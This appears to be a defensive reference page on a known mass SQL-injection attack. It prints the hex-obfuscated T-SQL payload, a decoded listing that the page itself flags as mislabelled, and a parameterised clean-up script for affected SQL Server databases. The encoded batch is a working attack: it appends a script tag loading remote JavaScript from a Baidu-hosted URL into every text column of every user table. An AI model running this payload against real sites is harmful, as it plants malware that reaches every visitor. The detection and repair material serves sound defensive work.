sql注入检测与修复语句(测试专用)


编码后的sql注入语句:

-- Obfuscated T-SQL batch exactly as it is seen in request logs: the hex literal is CAST back
-- to a string and executed with EXEC, and the trailing '--' discards whatever the application
-- appended after the injected value.  For detection, the stable signature is the
-- CAST(0x... AS VARCHAR(...)) ... EXEC(@...) pair rather than the hex content, which changes
-- with every URL the operators use.  The decoded batch is listed below this line.
;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F68692E62616964752E636F6D2F7375706B6F2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS VARCHAR(4000));EXEC(@S);--


原sql注入语句:

-- Kept verbatim as a reference sample; compare it against the decoded hex above before
-- relying on it.  NOTE(review): as printed, the Exec below calls
-- replace(..., '<script src=...></script>', ''), i.e. this listing STRIPS the tag; the
-- injecting form of this batch would append it instead, so the heading "original injection
-- statement" looks like a mislabel.
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor
For
    -- One row per (user table, column) whose column type is ntext (xtype 99), text (35),
    -- nvarchar (231) or varchar (167).  A clean-up script has to cover the same four types
    -- or it leaves part of the data untouched.
    Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From  Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
    -- Dynamic SQL built by concatenation: the [..] brackets are not QUOTENAME'd, so a table or
    -- column name containing ']' breaks the statement.  Convert(Varchar(8000)) truncates values
    -- longer than 8000 characters and loses non-ASCII data in nvarchar/ntext columns, and Rtrim
    -- removes trailing whitespace -- every row of every matched column is rewritten, with no
    -- WHERE clause, even where the payload is absent.  Expect data changes beyond the tag removal.
    Exec('update ['+@T+'] Set ['+@C+']=replace(Rtrim(Convert(Varchar(8000),['+@C+'])),''<script src=http://hi.baidu.com/supko/b.js></script>'','''')')
    Fetch Next From  Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

 

修复sql注入语句:

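-- Clean-up for the mass SQL-injection payload shown above: remove the injected fragment from
-- every varchar/nvarchar column of every user table.
-- Changes from the original form:
--   * the fragment to remove is a parameter (@payload) bound through sp_executesql, so the only
--     concatenated parts of the dynamic SQL are QUOTENAME'd identifiers;
--   * both varchar and nvarchar columns are covered, not only the single type in @fieldtype
--     (the injection also targets text/ntext, which REPLACE cannot take directly -- those are
--     NOT handled here and need a separate CONVERT-based pass);
--   * each UPDATE carries a WHERE CHARINDEX(...) > 0 predicate, so rows without the payload
--     are left untouched instead of being rewritten;
--   * a documented local cursor + sp_executesql loop replaces the undocumented
--     sp_MSforeach_Worker / hCForEach GLOBAL-cursor contract.
-- Take a backup first and run inside an explicit transaction so the outcome can be inspected
-- and rolled back.
DECLARE @payload NVARCHAR(4000);
-- Exact fragment to strip.  Set it to the string actually found in the data: the default below
-- is the literal from the original script, while the sample injection listed above on this
-- page inserts '<script src=http://hi.baidu.com/supko/b.js></script>' -- they do not match,
-- so verify the value (e.g. SELECT ... WHERE CHARINDEX(@payload, col) > 0) before running.
SET @payload = N'<script_src=http://ucmal.com/0.js> </script>';

DECLARE @sql NVARCHAR(4000);

-- One UPDATE statement per (user table, varchar/nvarchar column).
DECLARE clean_cursor CURSOR LOCAL FAST_FORWARD FOR
SELECT N'UPDATE ' + QUOTENAME(o.name)
    + N' SET ' + QUOTENAME(c.name)
    + N' = REPLACE(' + QUOTENAME(c.name) + N', @p, N'''')'
    + N' WHERE CHARINDEX(@p, ' + QUOTENAME(c.name) + N') > 0'
FROM sysobjects AS o
INNER JOIN syscolumns AS c
    ON c.id = o.id
INNER JOIN systypes AS t
    ON t.xusertype = c.xusertype
WHERE OBJECTPROPERTY(o.id, N'IsUserTable') = 1
    AND t.name IN (N'varchar', N'nvarchar');

OPEN clean_cursor;
FETCH NEXT FROM clean_cursor INTO @sql;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- @p is bound, never concatenated, so the payload text cannot alter the statement.
    EXEC sp_executesql @sql, N'@p NVARCHAR(4000)', @p = @payload;
    FETCH NEXT FROM clean_cursor INTO @sql;
END;
CLOSE clean_cursor;
DEALLOCATE clean_cursor;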


 
